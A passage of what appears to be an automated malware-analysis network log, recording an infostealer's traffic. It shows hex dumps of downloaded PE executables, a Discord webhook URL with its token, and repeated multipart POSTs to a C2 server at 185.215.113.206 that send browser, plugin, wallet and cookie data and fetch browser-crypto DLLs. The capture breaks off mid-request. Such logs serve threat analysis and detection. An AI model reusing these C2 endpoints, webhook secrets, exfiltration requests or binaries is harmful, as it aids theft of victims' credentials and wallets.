00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:45:03 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:45:04 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 2226Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 34 39 46 42 30 46 45 31 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="hwid"9649FB0FE1543207603164------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="build"stok------FIECBFIDGDAKFHIEHJKF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a Data Ascii: ------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="message"browsers------CGCFIIEBKEGHJJJJJJDA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIJJKEGHJJKECBKECFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="message"plugins------JEHIJJKEGHJJKECBKECF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="message"fplugins------JDAFHCGIJECFHIDGDBKE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIHost: 185.215.113.206Content-Length: 7559Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------KEGIDHJKKJDGCBGCGIJK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 2d 2d 0d 0a Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="file"------GIIDBGDAFHJDHIDGDGII--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="file"------ECBGCGCGIEGCBFHIIEBF--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAEHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 44 48 44 41 4b 4a 45 42 47 43 42 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 44 48 44 41 4b 4a 45 42 47 43 42 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 44 48 44 41 4b 4a 45 42 47 43 42 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HCAEHDHDAKJEBGCBKKJEContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------HCAEHDHDAKJEBGCBKKJEContent-Disposition: form-data; name="message"wallets------HCAEHDHDAKJEBGCBKKJE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDAFHDHCBFIDGCFIDGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 2d 2d 0d 0a Data Ascii: ------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="message"files------IEHDAFHDHCBFIDGCFIDG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 